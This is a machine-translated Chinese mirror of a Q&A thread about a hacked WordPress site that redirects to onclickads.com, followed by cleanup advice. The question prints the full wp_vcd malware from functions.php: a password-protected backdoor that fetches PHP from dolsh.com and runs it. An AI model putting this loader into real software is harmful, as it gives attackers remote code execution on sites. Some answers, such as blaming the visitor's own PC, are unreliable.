Fatal编程技术网
  • php/
  • Php WordPress网站已将我的链接重定向到onclickads网站

Php WordPress网站已将我的链接重定向到onclickads网站

php wordpress

Php WordPress网站已将我的链接重定向到onclickads网站,php,wordpress,malware,Php,Wordpress,Malware,我不知道这是不是唯一的密码 每次我在我的网站上点击一些链接时,它都会在onclickads.com链接上重定向我 每次我在theme functions.php上删除这段代码时,它都会一次又一次地生成这段代码。。当我检查主题函数的原始文件时,这段代码不包括在内 <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '

我不知道这是不是唯一的密码 每次我在我的网站上点击一些链接时,它都会在onclickads.com链接上重定向我

每次我在theme functions.php上删除这段代码时,它都会一次又一次地生成这段代码。。当我检查主题函数的原始文件时,这段代码不包括在内

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
        case 'change_domain';

        if (isset($_REQUEST['newdomain']))
        {

            if (!empty($_REQUEST['newdomain']))
            {
                if ($file = @file_get_contents(__FILE__))
                {
                    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                    {
                        $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                        @file_put_contents(__FILE__, $file);
                        print "true";
                    }
                }
            }
        }
        break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
        {

            function w1p_te1mp_se1tup($phpCode) {
                $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            extract(w1p_te1mp_se1tup($tmpcontent));
        }
    }
}

?>

此onclickads.com重定向通常是由计算机上安装的广告软件引起的。这些广告软件程序与您从互联网下载的其他免费软件捆绑在一起

可能您不需要安装新版本,您可以通过以下步骤从站点中删除此类注意事项

要删除onclickads.com重定向,请执行以下步骤:

1) 已从文件中删除不需要的代码

2) 从Windows卸载恶意程序

3) 在你的系统上使用安全软件,也可以在你的WordPress中使用安全插件

在遵循这些步骤之后,仍然没有任何效果,然后您可以安装一个新版本,并使用新版本安装安全插件,以避免在将来使用时受到黑客攻击


希望这对你有帮助。谢谢。
要完全删除代码,如果您使用的是子主题,您必须同时将其从父主题中删除。
我为解决问题所做的:


  • wp include
    目录中,删除
    wp vcd.php
    class.wp.php
    文件
    • 

  • wp include
    目录中,打开
    post.php
    并首先删除
    php
    恶意软件添加的标签
    • 

  • 打开主题的
    functions.php
    文件,删除上面的代码
    • 

    这是一个完整详细的解决方案,如何修复我在为受攻击的网站寻找解决方案后发现的恶意软件攻击


    如果每次都会再次生成,我建议你重新安装wordpress,让黑客们从你的安装中解脱出来。谢谢你的建议也许我会这样做,我别无选择:(非常感谢,我刚刚卸载了我的Cyberghost VPN,现在Onclickads.com不见了,但是上面的代码仍然显示了我所有的插件都被停用了。谢谢Wordfence帮助我解决了这个问题。我的wp上有一个未知的文件,包括wp_vcd.php和class-wp.php,这就是罪魁祸首关闭了post.php上的所有和一些函数。)。。现在我的网站运行正常:DGreat Work@GravityCode:-)这不是一个有用的答案,在评论中更合适。